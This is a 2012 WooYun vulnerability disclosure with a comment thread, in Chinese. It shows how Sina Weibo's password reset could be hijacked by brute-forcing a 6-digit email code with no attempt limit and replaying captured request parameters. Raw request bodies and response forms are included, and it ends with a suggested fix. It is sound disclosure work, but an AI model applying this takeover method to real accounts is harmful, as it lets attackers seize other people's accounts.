当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-09452

漏洞标题:新浪微搏修改任意用户密码

相关厂商:新浪

漏洞作者: only_guest

提交时间:2012-07-10 23:46

修复时间:2012-07-11 12:08

公开时间:2012-07-11 12:08

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-07-10: 细节已通知厂商并且等待厂商处理中
2012-07-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

和最近爆的几个修改任意用户密码的漏洞有些点相似.知道帐号就能修改密码.

详细说明:

弱伪随机数引起的问题.下面附上详细过程.
使用新浪微搏帐号的密码找回功能


首先选择安全邮箱找回密码


跳转到此页面.6位数字.000000-999999范围.如果没有尝试次数的限制,破解是很容易的.我们继续向下看.


从邮箱查看到真实的验证码为746486
然后我们回到密码找回页面输入正确的验证码来尝试修改密码.

loginname=5447055%40qq.com&uid=2393972150&timestamp=1341933068&ag=&m=f06f8b141fea148217d15f3939b0cac1&_email=5447055%40qq.com&confirm=746486


在提交的时候抓到上面的包文内容


因为有密码强度的限制.于是我把密码修改为asdasd123


抓到如下内容

loginname=5447055%40qq.com&uid=2393972150&timestamp=1341933068&ag=&m=f06f8b141fea148217d15f3939b0cac1&_confirm=746486&m2=edcf24f53e86e9c23f82e28458ba647e&password=b381431d2daf7c7d0f11e496510abef6405e491fabc26bc87e144dc5f52f6e24b40a8dfde7fc7e42e4261483d87f31dcc85bd704aff45f29c0c7bc122beaadcb2aead81e621f36070e50d1607d91457b8f2065079920cb7bf18acaebdfbda09c2985fc08a9129591654c997dab97fde294dba9f8160d50889e544233d25f41bf&cpassword=248798cfcafceb43041a883ebdd515ceb90622b01c2b4ed03979c1aa97d516a1c6de42fa970c60c7962f9336bb03e5cbd32632d03f47623326178374b8216df76578f9c88d12ee7239ce2bcd43ba965f26def411b69c90a43c8e7428829e0d674d58d1a9a786b2e904ac854e46677563f20d236423ff483ce0486e0ad6fe9bea


对比了一下.找到相同的参数如下
loginname
uid
timestamp
ag
m
confirm
剩余的参数我猜想应该是我修改的新密码.
也就是说.我只要有以上参数就可以修改密码了.
上述参数中,除confirm外都是已知的,也就是说只有那个6位随机数需要我们去破解.就可以修改密码了.我来做一个这样的尝试.


聪明的同学们看懂了么?
图中马赛克部分为我的cookies


在长达10几分钟的破解时间后.通过使用回包大小的排序,
我看到得到了上图中所示的这个随机码.
668707,然后看这个验证码的回包中有如下关键词.

<ul class="W_f14 W_fb topic_list clearfix">
<li>设置新密码</li>
</ul>
<div class="form_table">
<dl class="clearfix">
<dt>新密码:š</dt>
<dd class="conbox">
<input type="password" class="W_inputStp width1" name="password" node-type="password" />


也就是说找到了正确的验证码.但这个时候找回密码的页面已经超时了.
我们在回包中找找上文中我们所需要的几个参数,找到如下内容

<div class="form_cloud_con"><form name="setpassword" id="setpassword" action="" method="post">
<input type="hidden" name="loginname" value="5447055@qq.com" />
<input type="hidden" name="uid" value="2393972150" />
<input type="hidden" name="timestamp" value="1341934162" />
<input type="hidden" name="ag" value="" />
<input type="hidden" name="m" value="9fb40f6ce6c6d0449674b9ca2211eb13" />
<input type="hidden" name="_confirm" value="668707" />
<input type="hidden" name="m2" value="57bf4004860b27ee006c611fc7a4ac63" />
<dl><dd class="space_b">


然后下面大家都知道了.构造上文中那个修改密码的包.修改密码就好了....
结束.

漏洞证明:


修复方案:

不要使用这类弱伪随机数做为找回密码的凭证,也不要不限制尝试次数.

版权声明:转载请注明来源 only_guest@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-07-11 12:08

厂商回复:

感谢only_guest反馈的该问题,要利用该问题,需在获知用户个人信息的前提下,通过暴力破解来实现。实际危害较轻微。新浪一直以来都在全力保护用户安全,暴力破解的问题,目前已经解决,请各位用户放心。
故对该问题进行”忽略“(公开)处理。请only_guest将联系方式发送给我们,我们将提供一份礼品表示感谢。感谢各位对新浪安全的支持!

漏洞Rank:18 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2012-07-10 23:48 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    。。我了个去。。 这个。。

  2. 2012-07-10 23:48 | testcvc ( 路人 | Rank:5 漏洞数:1 | test)

    根据取回密码的链接?

  3. 2012-07-10 23:49 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    文盲了, 标题里的“搏”错了!

  4. 2012-07-10 23:51 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    邪恶下。。把乌云的微博密码改改~~ 哈哈

  5. 2012-07-10 23:51 | only_guest 认证白帽子 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)

    @gainover 擦.这么晚你还在!

  6. 2012-07-10 23:52 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @only_guest 正准备去睡么,刷新了下乌云,就看到你这个标题,亮下了我的狗眼。。

  7. 2012-07-10 23:53 | 闪电小子 ( 实习白帽子 | Rank:63 漏洞数:5 | PKAV技术宅社区!---闪电小子!)

    @gainover 好想法,哈哈!更加有证明力呀!

  8. 2012-07-11 00:00 | 小乖 ( 路人 | Rank:21 漏洞数:6 | 这个家伙很懒,什么也没留下。)

    破处贴,关注下0.0,影响貌似好大啊.

  9. 2012-07-11 00:03 | only_guest 认证白帽子 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)

    @gainover 嗯`我去改乌云微搏密码.

  10. 2012-07-11 00:07 | Moments ( 实习白帽子 | Rank:55 漏洞数:10 | 2)

    牛逼耷拉地,我来顶洞主啦

  11. 2012-07-11 00:25 | Passer_by ( 实习白帽子 | Rank:97 漏洞数:21 | 问题真实存在但是影响不大(腾讯微博Passer...)

    擦。。。。。。。。。。。。。。牛b啊。。居然还放出来了。。新浪要送lz一箱公仔了。。。

  12. 2012-07-11 00:38 | yy520 ( 普通白帽子 | Rank:139 漏洞数:12 )

    这洞~ 真厉害

  13. 2012-07-11 00:43 | only_guest 认证白帽子 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)

    懒得折腾了.睡觉去.心情不好.蛋疼

  14. 2012-07-11 03:08 | 数据流 ( 普通白帽子 | Rank:716 漏洞数:88 | all or nothing,now or never)

    我擦 牛逼啊

  15. 2012-07-11 08:06 | koohik ( 普通白帽子 | Rank:542 漏洞数:63 | 没什么介绍的http://www.koohik.com/)

    求真相!

  16. 2012-07-11 08:48 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    V5你懂的。。。

  17. 2012-07-11 08:55 | an1k3r ( 普通白帽子 | Rank:474 漏洞数:40 | 0.0)

    强大啊

  18. 2012-07-11 09:09 | 一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | ‮‮PKAV技术宅社区-安全爱好者)

    能不要这么牛B么……

  19. 2012-07-11 09:21 | 白胡子 ( 路人 | Rank:24 漏洞数:3 )

    这真心牛B

  20. 2012-07-11 09:21 | xsjswt ( 普通白帽子 | Rank:156 漏洞数:49 | 我思故我猥琐,我猥琐故我强大)

    这个已经出离牛逼了

  21. 2012-07-11 09:22 | 牛£金钢 ( 路人 | Rank:12 漏洞数:4 | 我是新手,还需要学习,大神们要指点下了.....)

    微博已经几天登录不上了,难道就是这个原因被改密码了

  22. 2012-07-11 09:30 | unic02n ( 实习白帽子 | Rank:73 漏洞数:9 | 我是来学习的!)

    啊,,这个洞,,呼叫sina,,求真像!!!

  23. 2012-07-11 09:33 | king ( 路人 | Rank:15 漏洞数:2 | 喜爱安全,网络游戏安全应用漏洞挖掘)

    难不成 判定key用的是uid,改密码用的是username???

  24. 2012-07-11 09:34 | shine 认证白帽子 ( 普通白帽子 | Rank:831 漏洞数:77 | coder)

    洞主威武,洞主荡漾,洞主是我们心中的红太阳!

  25. 2012-07-11 09:41 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    改了给我玩玩

  26. 2012-07-11 09:41 | 十九楼(乌云厂商)

    求真相

  27. 2012-07-11 09:46 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    谁改我密码我跟谁急!

  28. 2012-07-11 10:00 | p.z 认证白帽子 ( 普通白帽子 | Rank:411 漏洞数:40 )

    @xsser 新密码123456,注意安全。

  29. 2012-07-11 10:06 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    @p.z 你还真的改?碉堡了

  30. 2012-07-11 10:52 | koohik ( 普通白帽子 | Rank:542 漏洞数:63 | 没什么介绍的http://www.koohik.com/)

    这个洞,很牛逼啊

  31. 2012-07-11 11:02 | livers ( 实习白帽子 | Rank:94 漏洞数:6 | mov esp,0jmp espcrash.....)

    @only_guest 还没有补掉吧

  32. 2012-07-11 11:05 | only_guest 认证白帽子 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)

    @livers 不知道.懒得去测试.昨晚测试没补.

  33. 2012-07-11 11:07 | WooYuner ( 路人 | Rank:0 漏洞数:1 | 没有准备,就是准备失败)

    只得帐号才行

  34. 2012-07-11 11:09 | wszf ( 路人 | Rank:24 漏洞数:3 | 打酱油)

    这么屌?

  35. 2012-07-11 11:10 | livers ( 实习白帽子 | Rank:94 漏洞数:6 | mov esp,0jmp espcrash.....)

    @only_guest 试下嘛 我都忙活一早上了 水太深了

  36. 2012-07-11 11:15 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    我勒个去~

  37. 2012-07-11 11:15 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @livers =。=

  38. 2012-07-11 11:17 | her0ma ( 核心白帽子 | Rank:598 漏洞数:84 | 专注小厂商三十年!)

    真心很牛B啊

  39. 2012-07-11 11:20 | 天一生水 ( 路人 | Rank:0 漏洞数:2 )

    求细节公开......

  40. 2012-07-11 11:29 | Hxai11 ( 普通白帽子 | Rank:1137 漏洞数:218 | 于是我们奋力向前游,逆流而上的小舟,不停...)

    这尼玛逆天啊,别公开啊,要不很多大牛的帐号不保。。。

  41. 2012-07-11 11:30 | FlyR4nk ( 普通白帽子 | Rank:119 漏洞数:18 )

    我擦,这是多么牛逼的洞啊

  42. 2012-07-11 11:31 | 牛£金钢 ( 路人 | Rank:12 漏洞数:4 | 我是新手,还需要学习,大神们要指点下了.....)

    @only_guest ,帮我拿番个密码吧

  43. 2012-07-11 11:37 | 天一生水 ( 路人 | Rank:0 漏洞数:2 )

    @Hxai11 这么大的事,新浪肯定会修复的....银家只不过去别的站点试试么........

  44. 2012-07-11 11:40 | 一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | ‮‮PKAV技术宅社区-安全爱好者)

    等啊,试不出来啊

  45. 2012-07-11 11:43 | Valo洛洛 ( 普通白帽子 | Rank:458 漏洞数:52 | 。)

    “要利用该问题,需在获知足够用户个人信息的前提下,通过暴力破解来实现。实际危害轻微。我们一直以来都在全力保护用户安全,暴力破解的问题,目前正在解决,请各位用户放心。”新浪的微博回复,是真的轻微呢还是被轻微了= =

  46. 2012-07-11 11:48 | Topman王 ( 实习白帽子 | Rank:31 漏洞数:6 | 软件开发工程师!白帽子!XSSER,渗透,SEO)

    求公开

  47. 2012-07-11 11:50 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @Valo洛洛 你猜~

  48. 2012-07-11 11:51 | 闪电小子 ( 实习白帽子 | Rank:63 漏洞数:5 | PKAV技术宅社区!---闪电小子!)

    @Valo洛洛 也不需要太多的信息!知道帐号就行了!

  49. 2012-07-11 12:09 | itleaf ( 普通白帽子 | Rank:140 漏洞数:17 )

    貌似很多人知道利用了的样子

  50. 2012-07-11 12:11 | also ( 普通白帽子 | Rank:424 漏洞数:52 | 招渗透/php/前端/ios&android安全,广州地...)

    曝光了

  51. 2012-07-11 12:11 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    - -||

  52. 2012-07-11 12:13 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    太可耻了,修复了然后忽略公开

  53. 2012-07-11 12:14 | only_guest 认证白帽子 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)

    @xsser 呵呵.玩蛋了

  54. 2012-07-11 12:16 | also ( 普通白帽子 | Rank:424 漏洞数:52 | 招渗透/php/前端/ios&android安全,广州地...)

    @only_guest @xsser 都是你们的错,应该让砸门玩会儿蛋,然后再上缴

  55. 2012-07-11 12:17 | her0ma ( 核心白帽子 | Rank:598 漏洞数:84 | 专注小厂商三十年!)

    尼玛 忽略的也太快了~!

  56. 2012-07-11 12:18 | FlyR4nk ( 普通白帽子 | Rank:119 漏洞数:18 )

    果然是修复后,然后公开,擦

  57. 2012-07-11 12:20 | zhk ( 普通白帽子 | Rank:436 漏洞数:70 | 先看公告~)

    @only_guest 背后应该也有联系吧???

  58. 2012-07-11 12:21 | only_guest 认证白帽子 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)

    @zhk 木有人联系我.只是微搏扩散比较速度.新浪怕造成负面影响.就迅速修补公开了.

  59. 2012-07-11 12:21 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @only_guest 类似的问题 下次喊我帮你测试个大V吧 实事求是

  60. 2012-07-11 12:23 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    @xsser 新浪的“忽略”后面有两个字:公开。应该是指希望迅速公开真实情况的意思吧?

  61. 2012-07-11 12:24 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @horseluke 额,那应该添加一个确认并且公开的功能?

  62. 2012-07-11 12:27 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    @xsser 估计即使有这个选项厂商也不知道怎么用......毕竟希望迅速公开的厂商太少了

  63. 2012-07-11 12:39 | king ( 路人 | Rank:15 漏洞数:2 | 喜爱安全,网络游戏安全应用漏洞挖掘)

    dz论坛的召回密码也是 6位随机码!!!

  64. 2012-07-11 12:40 | Jannock 认证白帽子 ( 核心白帽子 | Rank:2278 漏洞数:204 | 关注技术与网络安全(招人中,有兴趣请私信...)

    刚试了一下,主要难点1、知道登陆帐号2、知道保密邮箱3、在短时间内暴破

  65. 2012-07-11 12:40 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @king 0-9和a-z不一样的

  66. 2012-07-11 12:45 | Jannock 认证白帽子 ( 核心白帽子 | Rank:2278 漏洞数:204 | 关注技术与网络安全(招人中,有兴趣请私信...)

    在找回密码方面,目前大部分通过手机找回密码的都是4位数字,让暴破情何以堪。。。

  67. 2012-07-11 12:46 | king ( 路人 | Rank:15 漏洞数:2 | 喜爱安全,网络游戏安全应用漏洞挖掘)

    @xsser 这当然知道 0-9和a-z 组合的密码次数爆破时间肯定不一样吗 好像我记得是数字吧!!!n久看的代码 具体的忘了

  68. 2012-07-11 12:49 | king ( 路人 | Rank:15 漏洞数:2 | 喜爱安全,网络游戏安全应用漏洞挖掘)

    只不过是 6位随机码跟用户 时间一起组合过吧可以写个程序 暴力6位数 +组合 暴力 ,只不过不能跟楼主这样暴力吧

  69. 2012-07-11 12:53 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    @Jannock “大部分通过手机找回密码的都是4位数字”......其实不怎么明白为啥都喜欢数字找回,又不是用在自助终端上......

  70. 2012-07-11 12:55 | Valo洛洛 ( 普通白帽子 | Rank:458 漏洞数:52 | 。)

    @xsser 猜个JJ。。竟然公开了

  71. 2012-07-11 13:00 | king ( 路人 | Rank:15 漏洞数:2 | 喜爱安全,网络游戏安全应用漏洞挖掘)

    @horseluke 这个呢 为什么是数字呢,,用户体验的考虑

  72. 2012-07-11 13:06 | 『 Change_era 』 ( 路人 | Rank:18 漏洞数:1 | 追逐时代的脚步,奋斗向上,努力先前进。)

    @only_guest 送新浪公仔100个,哈

  73. 2012-07-11 13:16 | only_guest 认证白帽子 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)

    @『 Change_era 』 1个就不错拉

  74. 2012-07-11 14:04 | 一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | ‮‮PKAV技术宅社区-安全爱好者)

    我擦,我就说嘛,这个随机码没来源啊;原来是我思想不够流氓~~新浪明显被轻微了~~洞主用的啥工具,我就想到了溯雪

  75. 2012-07-11 14:07 | tpu01yzx ( 实习白帽子 | Rank:58 漏洞数:8 | test)

    @only_guest 其实,这应该有个“离线”版本的。不解释。

  76. 2012-07-11 14:31 | Mr.杨总 ( 路人 | Rank:14 漏洞数:4 | 绿色 无毒 你懂得。。。。心要宽 。。。)

    思路可以有。。。

  77. 2012-07-11 14:51 | Aの碎碎念 ( 路人 | Rank:11 漏洞数:4 | 腐宅求妹子~)

    你妹啊,还无影响~!! 下次改个小秘书的密码发一次~~

  78. 2012-07-11 14:56 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    好猛哦。全家福一份。微观群众好多。

  79. 2012-07-11 15:48 | we8i ( 路人 | Rank:5 漏洞数:1 | 90sec的)

    干嘛要公布出来。我晕。。。

  80. 2012-07-11 15:52 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @we8i 你这什么想法

  81. 2012-07-11 15:55 | we8i ( 路人 | Rank:5 漏洞数:1 | 90sec的)

    @xsser 我爱你~

  82. 2012-07-11 17:38 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    @only_guest @xsser "需在获知用户个人信息的前提下,通过暴力破解来实现。实际危害较轻微。"--危害轻?"暴力破解的问题,目前已经解决,请各位用户放心。故对该问题进行”忽略“(公开)处理。"解决了忽略.叫轻?危害其实不低了,一般都知道别人QQ知道邮箱的特别是名人的....如xsser @_@表达不当啊@_@危害轻微就修复了,还忽略

  83. 2012-07-11 17:41 | 天一生水 ( 路人 | Rank:0 漏洞数:2 )

    没想当人家直接忽视了.........你那公仔飞走了..他说的防暴力破解就只有时间限制跟尝试次数么????求大妞们解答....

  84. 2012-07-11 18:26 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    缺陷关联: WooYun: 友宝售货机注册漏洞 (@Jannock 提到的暴力破解问题)

  85. 2012-07-11 22:45 | 『 Change_era 』 ( 路人 | Rank:18 漏洞数:1 | 追逐时代的脚步,奋斗向上,努力先前进。)

    @xsser 为啥最近审核漏洞哪摸慢呢,亲!!!

  86. 2012-07-12 15:09 | leehenwu ( 普通白帽子 | Rank:194 漏洞数:24 | 撸·啊·撸)

    哇哈哈

  87. 2012-07-12 16:59 | 凤凰 ( 路人 | Rank:15 漏洞数:6 | 涅磐)

    第三方应用授权码产生过程是什么样的呢?

  88. 2012-07-13 09:09 | Hxai11 ( 普通白帽子 | Rank:1137 漏洞数:218 | 于是我们奋力向前游,逆流而上的小舟,不停...)

    @Jannock @horseluke 话说那qq的手机令牌,有破解的可能性吗?首先,令牌随机验证码是30秒换一次,而且随机码是6位数的,我不知道最高值是多少,且有时间校准方案,请问像这样有办法破解吗?

  89. 2012-07-13 11:26 | tpu01yzx ( 实习白帽子 | Rank:58 漏洞数:8 | test)

    @Hxai11 才6位数,基本上普通PC可以破10位纯数字,个人觉得可破性比较高,如果还是使用系统自带的随机数生成器的话。不过首先我需要手机令牌的代码,知道里面是如何操作的。

  90. 2012-07-13 13:10 | her0ma ( 核心白帽子 | Rank:598 漏洞数:84 | 专注小厂商三十年!)

    修改密码的URL之允许正确点击一次的情况下 以上的漏洞还能利用么?猜测的过程猜测正确是不是就是一次200,等你第二次访问浏览器修改密码的时候这个URL就已经失效了。百度还是神马貌似就是只能点击一次修改密码的URL.很多都是24小时有效,但是没有限制次数。

  91. 2012-07-13 20:58 | tpu01yzx ( 实习白帽子 | Rank:58 漏洞数:8 | test)

    @her0ma 那是正确情况下只能一次有效,错误情况下就不是这样的啦,否则很容易被人恶意攻击,导致合法用户也无法重置密码了。

  92. 2012-07-15 21:22 | her0ma ( 核心白帽子 | Rank:598 漏洞数:84 | 专注小厂商三十年!)

    @tpu01yzx 用工具猜测一次200 然后获取了URL 第二次浏览器访问的时候应该已经就失效了~ 所以还是比较有压力的!

  93. 2012-07-16 09:36 | unic02n ( 实习白帽子 | Rank:73 漏洞数:9 | 我是来学习的!)

    @Jannock 确实是有不小的难度,真心不觉得够18分。

  94. 2012-07-16 09:45 | 一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | ‮‮PKAV技术宅社区-安全爱好者)

    @her0ma 新浪之前的机制是有问题的,验证码30分钟有效期,只要验证码正确验证后,会跳入下一步改密码的流程,这个时候带入前面的所有参数,包括刚刚验证成功的验证码信息。所以很容易成功的,危害还是很大的